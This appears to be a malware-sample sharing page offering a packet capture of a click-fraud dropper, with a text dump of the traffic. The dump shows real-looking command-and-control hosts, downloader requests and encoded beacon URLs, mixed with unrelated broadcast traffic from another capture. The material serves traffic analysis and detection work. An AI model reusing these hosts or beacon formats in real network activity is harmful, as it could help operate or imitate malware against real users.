Text Example

ClickFraud Malware Dropper Downloader PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 19
    Date added: May 24, 2019 12:02 am Added by: admin File size: 6 MB Downloads: 9

2011-08-17 03:46:37.698781 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [P.], seq 1:82, ack 1, win 64240, length 81
E..y{.@…… T….o.Z.=TP……P…….GET /tool/train/c.txt HTTP/1.1
User-Agent: VBTagEdit
Host: zxc.78rr.cn:3389

2011-08-17 03:46:37.698788 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [P.], seq 1:82, ack 1, win 64240, length 81
E..y{.@…… T….o.Z.=TP……P…….GET /tool/train/c.txt HTTP/1.1
User-Agent: VBTagEdit
Host: zxc.78rr.cn:3389

2011-08-17 03:46:38.011101 IP 222.189.228.111.3389 > 147.32.84.130.3930: Flags [P.], seq 1:404, ack 82, win 65454, length 403
E…..@.i.Fq…o. T..=.Z….TP.9P…….HTTP/1.1 200 OK
Content-Length: 177
Content-Type: text/plain
Last-Modified: Sat, 09 Jul 2011 13:39:06 GMT

Accept-Ranges: bytes

|http://zhu.kc18.cn:3389/128.htm
2011-08-17 03:46:38.185689 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [.], ack 404, win 63837, length 0
E..({.@….2. T….o.Z.=TP.9….P..]K!..GET /t
2011-08-17 03:46:38.185700 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [.], ack 404, win 63837, length 0
E..({.@….2. T….o.Z.=TP.9….P..]K!..GET /t
2012-10-04 10:26:22.527751 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306
E..N….@…………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………
2012-10-04 10:26:27.566140 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306
E..N….@.Zb………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………
2012-10-04 10:26:32.602580 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306
E..N….@…………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………
2012-10-04 10:26:37.520204 IP 192.168.248.1.17500 > 192.168.248.255.17500: UDP, length 310
E..R….@.hs……..D\D.>%r{“host_int”: 129667009, “version”: [1, 8], “displayname”: “129667009”, “port”: 17500, “namespaces”: [173402115, 164806200, 81434131, 169597399, 23578136, 115911321, 165474655, 89292257, 26249186, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 69806233, 146989439, 83940796, 139226175]}
2012-10-04 10:26:37.638864 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306

E..N….@..………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………

2012-10-04 10:27:15.984833 IP 192.168.248.165.1111 > 108.168.255.244.80: Flags [.], ack 1, win 64240, length 0
E..(.s@….q….l….W.P..(h…GP…….
2012-10-04 10:27:15.984940 IP 192.168.248.165.1111 > 108.168.255.244.80: Flags [P.], seq 1:71, ack 1, win 64240, length 70: HTTP: GET /app/geoip.js HTTP/1.0
E..n.t@….*….l….W.P..(h…GP…….GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close

2012-10-04 10:27:15.990195 IP 108.168.255.244.80 > 192.168.248.165.1111: Flags [.], ack 71, win 64240, length 0
E..(……|.l……..P.W…G..(.P………….
2012-10-04 10:27:15.990228 IP 108.168.255.244.80 > 192.168.248.165.1111: Flags [FP.], seq 1:722, ack 71, win 64240, length 721: HTTP: HTTP/1.0 200 OK
E………z$l……..P.W…G..(.P…….HTTP/1.0 200 OK
Expires: Wed, 07 Aug 2013 19:04:11 GMT

Cache-Control: private, max-age=0

2012-10-04 10:30:25.388047 IP 192.168.248.165.1137 > 108.168.255.244.80: Flags [.], ack 1, win 64240, length 0
E..(.a@………l….q.P..e…..P…;R..
2012-10-04 10:30:25.388126 IP 192.168.248.165.1137 > 108.168.255.244.80: Flags [P.], seq 1:71, ack 1, win 64240, length 70: HTTP: GET /app/geoip.js HTTP/1.0
E..n.b@….<….l….q.P..e…..P…7O..GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close

2012-10-04 10:30:25.388283 IP 108.168.255.244.80 > 192.168.248.165.1137: Flags [.], ack 71, win 64240, length 0
E..(……|(l……..P.q……e.P…;………
2012-10-04 10:30:25.392440 IP 108.168.255.244.80 > 192.168.248.165.1137: Flags [FP.], seq 1:722, ack 71, win 64240, length 721: HTTP: HTTP/1.0 200 OK
E………yVl……..P.q……e.P…/J..HTTP/1.0 200 OK
Expires: Wed, 07 Aug 2013 19:07:20 GMT

Cache-Control: private, max-age=0

2012-10-04 10:30:34.381272 IP 192.168.248.165.1138 > 81.17.26.187.80: Flags [.], ack 1, win 64240, length 0
E..(..@….3….Q….r.Pg.^f.&..P…….
2012-10-04 10:30:34.381377 IP 192.168.248.165.1138 > 81.17.26.187.80: Flags [P.], seq 1:361, ack 1, win 64240, length 360: HTTP: GET /X11HXlhHWF1bR1hbWUZcXA8KCloKW19QCF0NDF8LXlpZCw0IUAtYWF9aCgsNXFMaUFwCUBwTCBMQU1k= HTTP/1.1
E…..@………Q….r.Pg.^f.&..P…r…GET /X11HXlhHWF1bR1hbWUZcXA8KCloKW19QCF0NDF8LXlpZCw0IUAtYWF9aCgsNXFMaUFwCUBwTCBMQU1k= HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Accept-Encoding: gzip, deflate
Host: dgyqimolcqm.cm
Connection: Keep-Alive

2012-10-04 10:30:34.381534 IP 81.17.26.187.80 > 192.168.248.165.1138: Flags [.], ack 361, win 64240, length 0

E..(……|.Q……..P.r.&..g._.P….n……..

2012-10-04 10:30:40.464647 IP 192.168.248.165.1141 > 64.71.142.120.80: Flags [.], ack 1, win 64240, length 0
E..(..@…q-….@G.x.u.P?.X…..P…….
2012-10-04 10:30:40.464937 IP 192.168.248.165.1141 > 64.71.142.120.80: Flags [P.], seq 1:400, ack 1, win 64240, length 399: HTTP: GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:0 HTTP/1.1
E…..@…o…..@G.x.u.P?.X…..P…p…GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:0 HTTP/1.1
Accept: /
Referer: http://egyptian-treasure.com/?afdt=z0v90dzttmcm83htf2w9m23b4jj521oqshirksa5i3bs&x=12&y=7&search=pain+patches+for+back+pain
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Host: 64.71.142.120
Connection: Keep-Alive

2012-10-04 10:30:40.465142 IP 64.71.142.120.80 > 192.168.248.165.1141: Flags [.], ack 400, win 64240, length 0

E..(……..@G.x…..P.u….?.Z!P………….

2012-10-04 10:31:34.389896 IP 192.168.248.165.1143 > 81.17.26.187.80: Flags [.], ack 1, win 64240, length 0
E..(..@………Q….w.Pt…R..TP…B:..
2012-10-04 10:31:34.395945 IP 192.168.248.165.1143 > 81.17.26.187.80: Flags [P.], seq 1:361, ack 1, win 64240, length 360: HTTP: GET /X1xHXVBHW1pHWF1fRlxcDwoKWgpbX1AIXQ0MXwteWlkLDQhQC1hYX1oKCw1cUxpQXAJQHBMIExBTWA== HTTP/1.1
E…..@….z….Q….w.Pt…R..TP…….GET /X1xHXVBHW1pHWF1fRlxcDwoKWgpbX1AIXQ0MXwteWlkLDQhQC1hYX1oKCw1cUxpQXAJQHBMIExBTWA== HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Accept-Encoding: gzip, deflate
Host: dgyqimolcqm.cm
Connection: Keep-Alive

2012-10-04 10:31:34.396130 IP 81.17.26.187.80 > 192.168.248.165.1143: Flags [.], ack 361, win 64240, length 0

E..(.B….|sQ……..P.wR..Tt..JP…@………

2012-10-04 10:31:34.631449 IP 192.168.248.165.1144 > 65.49.23.146.80: Flags [.], ack 1, win 64240, length 0
E..(..@………A1…x.P.DF…..P…@F..
2012-10-04 10:31:34.631648 IP 192.168.248.165.1144 > 65.49.23.146.80: Flags [P.], seq 1:399, ack 1, win 64240, length 398: HTTP: GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:1 HTTP/1.1
E…..@….W….A1…x.P.DF…..P…k…GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:1 HTTP/1.1
Accept: /
Referer: http://egyptian-treasure.com/?afdt=z0v90dzttmcm83htf2w9m23b4jj521oqshirksa5i3bs&x=12&y=7&search=pain+patches+for+back+pain
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Host: 65.49.23.146
Connection: Keep-Alive

2012-10-04 10:31:34.631827 IP 65.49.23.146.80 > 192.168.248.165.1144: Flags [.], ack 399, win 64240, length 0

E..(.H…..vA1…….P.x…..DHuP…>………

2012-10-04 10:32:34.372385 IP 192.168.248.165.1146 > 81.17.26.187.80: Flags [.], ack 1, win 64240, length 0
E..(.R@….c….Q….z.P,1.a21..P…wK..
2012-10-04 10:32:34.372512 IP 192.168.248.165.1146 > 81.17.26.187.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460: HTTP: GET /WFBQR1hYXEdYWFxHWFpfRgoFAAoCVhwbBVQIITtZCi0GHyUTLB4kLShcJQQRHzBbL1kIPlAcMBBcAwtbWR8wWxEZMFsaHAouAR45WycCMDE7ATk+ER4MIRkrCFk7BD4CARwMPy8GDQQzETMEAQgwWVgfM1k/Kj0hPFgnBCcCO1gKBSQCM1ojPSMqPDE/JT4tBV0nBz8jMBM7EDMFDQA/Wyc4PS8jJT8CXAckLgJbOD0rHSYxJFwLPB0YDS5YXT8sMFknWgUkPjwROgwFIy4NWhk4OlgBMzAEEScIEDwQOwRcGDA+Cl0nPxk4M1sRGwghOx0kMT8iDAIZWj9ZWFkNWjsCJyEvBzMvBVs6Ew0APj0FOCQEIFk9PAEgDVgFOD48DlgzPDs6CDwdEyM9Iy49Ag0tCD0nBzNZBlk+MQ1fMAI/Ozs/I109IS8GMFgvLjgHJxs4WQUIPyEvHQo9ATs9LQFfC1tQWQo8PzkmLCM+JwM7IAs+ARw7LQ0bPS8nXTAFLyQ8LgZdJwczPjA8DRA4WQUjOwcnCDwvBSIIWg0iPFsjBCY/Dlk9PD8iDS0KWiQ+HSEzWgpZOAQ4BSQCM1kwWjhYPj4FBT4FBlo+PycwJAQRBjwuPwImLiMdMz8BICcsWCw8AixdPio8EDgCJxAzAhk5OAQdADoEI1kwBwVcPQUOHjw9M10mMSs4JyEvBTg/ATk+Lh0sPT8nHj4vJxs/BT8gPVlQMQsuMy09Ww0nClsjPjosJFsIBSwQOgINAjA9Jys9BTxdPFkdKjwsWAAKLzMQCgQzGyM9Iy4MPlhbJi84EzwvK1w7PxksCgU7MQohDSsjPSMqO1k7OSM9Iy4MPysYOjwnGQgEHS8KPQFfMAQ/JAgHPF0kPhk8Cz4zEyY9ARA8PCRdPVknIg0xM1w6KjwQOwQFOD4+BSE9AzgTPS0BWD8/OxsmLTMuOywvJQwxChEzAzAQOjwnPQwsUAMMPA0iJC08WzwsUAUKPFAZClgzXCQ+PyY8PScmOwIzBiQsXRA9LBpaJD08XTo/JzAzLDM/Pi4/MDMFKx4mLFkFJAIzLDMqPBA7BAEmPiEjLQoDBR4jPSMuCAUFBjpbUCQ7BScADSErGSRZGS44PSwRJC0jMzssAQg7PQ5cPFsdIg0APBA7BwJaOz87Ogg+XBM7BD9ZPgMFIDAxBQE/LCQeCyE/BjotDVg4BA04PyE/BgpZXVojPSMqPBMFLThYJy8wWjstPjxcJQo8Lxw6WwE8PC4REzgxAQQLLy8ZClk8ETw8MFwzLB05JzwwHgoCWAczWCsBCi4dBQgHO1skEDwQOwINPQw8Iy4+BS8fPj0/LjA+WAA/PScxJ1o7KzMTJxw+AyRcJzwvAggCASQ7OjwQOwcrADoAPBA4AllYJy4eEApZWC8wWgUwJ1sRIzs/PzA7PyBdCjw/AgsvBS8LPwUwPT0NLgs[!http]
E….S@………Q….z.P,1.a21..P…0..GET /WFBQR1hYXEdYWFxHWFpfRgoFAAoCVhwbBVQIITtZCi0GHyUTLB4kLShcJQQRHzBbL1kIPlAcMBBcAwtbWR8wWxEZMFsaHAouAR45WycCMDE7ATk+ER4MIRkrCFk7BD4CARwMPy8GDQQzETMEAQgwWVgfM1k/Kj0hPFgnBCcCO1gKBSQCM1ojPSMqPDE/JT4tBV0nBz8jMBM7EDMFDQA/Wyc4PS8jJT8CXAckLgJbOD0rHSYxJFwLPB0YDS5YXT8sMFknWgUkPjwROgwFIy4NWhk4OlgBMzAEEScIEDwQOwRcGDA+Cl0nPxk4M1sRGwghOx0kMT8iDAIZWj9ZWFkNWjsCJyEvBzMvBVs6Ew0APj0FOCQEIFk9PAEgDVgFOD48DlgzPDs6CDwdEyM9Iy49Ag0tCD0nBzNZBlk+MQ1fMAI/Ozs/I109IS8GMFgvLjgHJxs4WQUIPyEvHQo9ATs9LQFfC1tQWQo8PzkmLCM+JwM7IAs+ARw7LQ0bPS8nXTAFLyQ8LgZdJwczPjA8DRA4WQUjOwcnCDwvBSIIWg0iPFsjBCY/Dlk9PD8iDS0KWiQ+HSEzWgpZOAQ4BSQCM1kwWjhYPj4FBT4FBlo+PycwJAQRBjwuPwImLiMdMz8BICcsWCw8AixdPio8EDgCJxAzAhk5OAQdADoEI1kwBwVcPQUOHjw9M10mMSs4JyEvBTg/ATk+Lh0sPT8nHj4vJxs/BT8gPVlQMQsuMy09Ww0nClsjPjosJFsIBSwQOgINAjA9Jys9BTxdPFkdKjwsWAAKLzMQCgQzGyM9Iy4MPlhbJi84EzwvK1w7PxksCgU7MQohDSsjPSMqO1k7OSM9Iy4MPysYOjwnGQgEHS8KPQFfMAQ/JAgHPF0kPhk8Cz4zEyY9ARA8PCRdPVknIg0xM1w6KjwQOwQFOD4+BSE9AzgTPS0BWD8/OxsmLTMuOywvJQwxChEzAzAQOjwnPQwsUAMMPA0iJC08WzwsUAUKPFAZClgzXCQ+PyY8PScmOwIzBiQsXRA9LBpaJD08XTo/JzAzLDM/Pi4/MDMFKx4mLFkFJAIzLDMqPBA7BAEmPiEjLQoDBR4jPSMuCAUFBjpbUCQ7BScADSErGSRZGS44PSwRJC0jMzssAQg7PQ5cPFsdIg0APBA7BwJaOz87Ogg+XBM7BD9ZPgMFIDAxBQE/LCQeCyE/BjotDVg4BA04PyE/BgpZXVojPSMqPBMFLThYJy8wWjstPjxcJQo8Lxw6WwE8PC4REzgxAQQLLy8ZClk8ETw8MFwzLB05JzwwHgoCWAczWCsBCi4dBQgHO1skEDwQOwINPQw8Iy4+BS8fPj0/LjA+WAA/PScxJ1o7KzMTJxw+AyRcJzwvAggCASQ7OjwQOwcrADoAPBA4AllYJy4eEApZWC8wWgUwJ1sRIzs/PzA7PyBdCjw/AgsvBS8LPwUwPT0NLgs
2012-10-04 10:32:34.372595 IP 192.168.248.165.1146 > 81.17.26.187.80: Flags [P.], seq 1461:2273, ack 1, win 64240, length 812: HTTP
E..T.T@….5….Q….z.P,1..21..P…….hBTEnAlkFJAIzPDotPwEwW1wBCxMBIwwuXBEwBBEGJyxcLzBbAR8NPw0IJAMNBgs+JyILWw0DJ1sRKzwHPzo/PhEjJwUnPzs9IFo/LhEDCxA8EDsEP1g+BAEmDD4ZATgxDSUwPhkeCgcjGQhbJwMzW1A5PD0FXzAxBQA9BwUBCwINGQsCOzgNWC8hCCwnBjwtO10kWw0mPS4ZGD0tOzokWx4TCCENHzM+GRE/WwUqOiwBOyQxKx4mPhEnIz0jKjpZASQkWg0uMAcvET08GVw/PSc+Oy4/HAoTL10/BCc6Iz0jLgw/PBA7BxkDPD87EDhYIxMwPzAQDAINMDwsGloNLFgYOBA8EDgCUAg/EyATPCw4WDpaL1wIWgVbPDEwWwoHOysnLC8gJFlRXApbIxE9PhoFJFk4VE8BVDBbJBAkMR4RJC0oHiYxHhAkLSwTJT0oXSU9KFpPDVQNBAUCMz5RHAshBQMLWiQcMFtQHQ8tLBAmKl0RJwM4HCQ9KFolAyARJAceHiUDKB4kAw4QJi08VA== HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Accept-Encoding: gzip, deflate
Host: dgyqimolcqm.cm
Connection: Keep-Alive

Leave a Reply